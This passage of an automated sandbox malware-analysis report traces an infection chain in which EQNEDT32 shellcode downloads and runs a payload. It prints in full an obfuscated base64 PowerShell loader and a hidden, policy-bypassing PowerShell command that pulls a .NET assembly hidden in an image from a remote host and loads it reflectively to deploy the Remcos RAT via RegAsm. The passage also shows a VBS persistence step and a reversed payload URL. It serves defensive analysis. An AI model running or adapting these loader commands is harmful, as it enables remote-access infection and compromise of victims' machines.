DgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreQwBNDgTreFIDgTreLwDgTre3DgTreDcDgTreNgDgTre2DgTreDIDgTreLwDgTre2DgTreDIDgTreLgDgTre0DgTreDEDgTreMgDgTreuDgTreDDgTreDgTreMQDgTreyDgTreC4DgTreMgDgTre5DgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreFIDgTreTQBDDgTreEQDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0x90000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:24:07
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }"
Imagebase:	0x90000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:24:17
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\RMCD.vbs"
Imagebase:	0x4a190000
File size:	302'592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:24:19
Start date:	24/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x820000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.872587798.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	10:24:29
Start date:	24/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\RMCD.vbs"
Imagebase:	0xff570000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:24:44
Start date:	24/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\RMCD.vbs"
Imagebase:	0xff6d0000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Disassembly

Reset < >

Analysis Process: EQNEDT32.EXEPID: 1644, Parent PID: 564COMMON

Execution Graph

Execution Coverage:	34.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	74.2%
Total number of Nodes:	66
Total number of Limit Nodes:	6

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 035C05B9 Relevance: 6.1, APIs: 4, Instructions: 106
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(035C05AB), ref: 035C05B9

Part of subcall function 035C05D3: URLDownloadToFileW.URLMON(00000000,035C05E4,?,00000000,00000000), ref: 035C065C
Part of subcall function 035C05D3: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035C069A
Part of subcall function 035C05D3: ExitProcess.KERNEL32(00000000), ref: 035C06B2

Memory Dump Source

Source File: 00000002.00000002.358501991.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 70dae1c57a0adeaea932a54d5c67910c5079bd2702018ffb532e84c283a4d258
Instruction ID: cbfac16094598819e96fd27b3eea987a65d25eb8eefc4b92a9ac4b598ea33aaf
Opcode Fuzzy Hash: 70dae1c57a0adeaea932a54d5c67910c5079bd2702018ffb532e84c283a4d258
Instruction Fuzzy Hash: E531489281C3C65FDB139BB01C2EB15BF247FA3108F5C8ACED4C60A4E3E6989181C396

Uniqueness

Uniqueness Score: -1.00%

Function 035C05D3 Relevance: 4.6, APIs: 3, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.358501991.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: fef83fa33419496b419abd0e8683b4953fd8d10ce3deba62f2eab56b0796f58f
Instruction ID: eedfbdd37ac9d8bdfb36c6c9abaa12fc9b9b6e7c1d2543e25adfc20b5b23546a
Opcode Fuzzy Hash: fef83fa33419496b419abd0e8683b4953fd8d10ce3deba62f2eab56b0796f58f
Instruction Fuzzy Hash: 9831089681C3C65FDB179BB01C6EB15BF606FA3508F5D8ACED4C60A4E3E7988081C796

Uniqueness

Uniqueness Score: -1.00%

Function 035C065A Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,035C05E4,?,00000000,00000000), ref: 035C065C

Part of subcall function 035C0673: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035C069A
Part of subcall function 035C0673: ExitProcess.KERNEL32(00000000), ref: 035C06B2

Memory Dump Source

Source File: 00000002.00000002.358501991.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: b2b53b9b7e7d574f953ce2f633a35b52c032c3a913c86b24448ed8525033e60a
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: 48F0E2545AC3C0EDEA12EBF46C4EF6A6E64BFC170CF25098DB1924F0F2D694C884C699

Uniqueness

Uniqueness Score: -1.00%

Function 035C0688 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035C069A

Part of subcall function 035C06AD: ExitProcess.KERNEL32(00000000), ref: 035C06B2

Memory Dump Source

Source File: 00000002.00000002.358501991.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 1ad8477d11f7c26a49c575b97230c73f5d3b4ad75030176d47ebbe7797ac09b1
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 690120585743C6EDDB38E6E4AC05BAA9795BB81708FDC484FA487070F1D158C5C3CD59

Uniqueness

Uniqueness Score: -1.00%

Function 035C0673 Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.358501991.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: ad9803ac35b2dcbc376aebc1fa9097fd02f4e82df46b7297cb3ddb2978a0d5e1
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: 4D012B245783C5ECD624E6E46C44B9EAAE5BBC170CFA8445EE0960B0F0D248C9C3CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 035C06AD Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 035C06B2

Memory Dump Source

Source File: 00000002.00000002.358501991.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035C06B4 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.358501991.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 6eb1ff7321aa8b4d87a0158064c3cadbb7a79f3ffded3376158becd19a715972
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 22D05271222643CFC304DF04D980E12F37AFFC8224B28C268E5004B66AC730E8D2CAD0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 035C04EC Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(035C04DA), ref: 035C04EC

Memory Dump Source

Source File: 00000002.00000002.358501991.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 993f138bff22eb97b802d8f648b49d119d0ad835934d22b1241a5dde261c9a57
Instruction ID: 325315ffb0202503733066d338ff8453e8ecd710b599a5ed3d1658c7d33da042
Opcode Fuzzy Hash: 993f138bff22eb97b802d8f648b49d119d0ad835934d22b1241a5dde261c9a57
Instruction Fuzzy Hash: 2D21ACAA82D3C09FD702DBB4A9AA025BF64796310871C86CEC4950F0F3E2A0D606D396

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 2040, Parent PID: 1096COMMON

Executed Functions

Function 0020D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.483791630.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cba43fc156536f0072ae3ba2df996428dc8953150107444f44440980e336e579
Instruction ID: 3cfb90050652a005a6f7f203ca9301d87bb49e2d9ddb3f3e84dbb1ef576d3e47
Opcode Fuzzy Hash: cba43fc156536f0072ae3ba2df996428dc8953150107444f44440980e336e579
Instruction Fuzzy Hash: 3E01F27052A340EBE7208E65CCC4B66BF99DF81764F18C41AEC4C0F2C3C2B99941CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0020D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.483791630.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc20f7ebf7387e7de61530572a29d45caeb7bd253df89794cecfea0a64bd1c3
Instruction ID: 65d1c522e47dc20ca18fa9bd58e6f3adfd78450204cb48db4a4685aae900270a
Opcode Fuzzy Hash: fcc20f7ebf7387e7de61530572a29d45caeb7bd253df89794cecfea0a64bd1c3
Instruction Fuzzy Hash: EEF06271515344AEE7108E16DCC4B62FF99EB81724F18C55AED485B683C3799C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 2824, Parent PID: 2040COMMON

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.7%
Total number of Nodes:	24
Total number of Limit Nodes:	2

Executed Functions

Function 003054A0 Relevance: 3.2, Strings: 2, Instructions: 675
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 00305D58
Hk, xrefs: 003056DC, 00305810, 00305894, 00305930, 003059CF, 00305A93, 00305B22, 00305CC4, 00305DA8, 00305EBE, 00305F42, 00305FBF

Memory Dump Source

Source File: 00000008.00000002.391051905.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_powershell.jbxd

Similarity

API ID:
String ID: ($Hk
API String ID: 0-1586854987
Opcode ID: 2e1795a6f6e0f92c733bf4d5abab73e9499b6c72a65df31944a7ce4506afb133
Instruction ID: 33ec9582facab22b2883e202b24583d3726d5ee199d0d3176b753c46c11ea551
Opcode Fuzzy Hash: 2e1795a6f6e0f92c733bf4d5abab73e9499b6c72a65df31944a7ce4506afb133
Instruction Fuzzy Hash: 7C62B174A01228CFDB65DF65C894BDEB7B2BF89300F1085EAD519A7291DB30AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00402BCC Relevance: 9.1, Strings: 7, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$&., xrefs: 00402C6D
d.., xrefs: 00402F8D
$&., xrefs: 00402C7A
L4#p, xrefs: 00402EBE
L4#p, xrefs: 00402EC9
d.., xrefs: 00402F9B
L4#p, xrefs: 00402E60

Memory Dump Source

Source File: 00000008.00000002.391093597.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: $&.$$&.$L4#p$L4#p$L4#p$d..$d..
API String ID: 0-3431261263
Opcode ID: 13465cfd6bcdff6a61d55f593d6c796120eb19a1c4e12f317858b19dc2f4cfed
Instruction ID: 4e73c82a6c6857741df6f674cf50aba1b419dc254930c92748c8a69fd4aae809
Opcode Fuzzy Hash: 13465cfd6bcdff6a61d55f593d6c796120eb19a1c4e12f317858b19dc2f4cfed
Instruction Fuzzy Hash: F0B11435B00245EFDB199E24C558BAF77A2AF84310F148477E911AB3D1CBB8DD81CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00400F20 Relevance: 7.8, Strings: 6, Instructions: 313
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D<8, xrefs: 00400FFF
h<8, xrefs: 0040124B
D<8, xrefs: 0040103B
D<8, xrefs: 004010B7
h<8, xrefs: 0040128F
D<8, xrefs: 00400F9A

Memory Dump Source

Source File: 00000008.00000002.391093597.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: D<8$D<8$D<8$D<8$h<8$h<8
API String ID: 0-3662978306
Opcode ID: 288502ec1984c5f282c9c90be1db765d75509e4ad7601e0edb0a6b8c3e0b4c50
Instruction ID: 874af6e9bcb55bd051f11706206a8d385c8b57489baa8658178f4741fed99d21
Opcode Fuzzy Hash: 288502ec1984c5f282c9c90be1db765d75509e4ad7601e0edb0a6b8c3e0b4c50
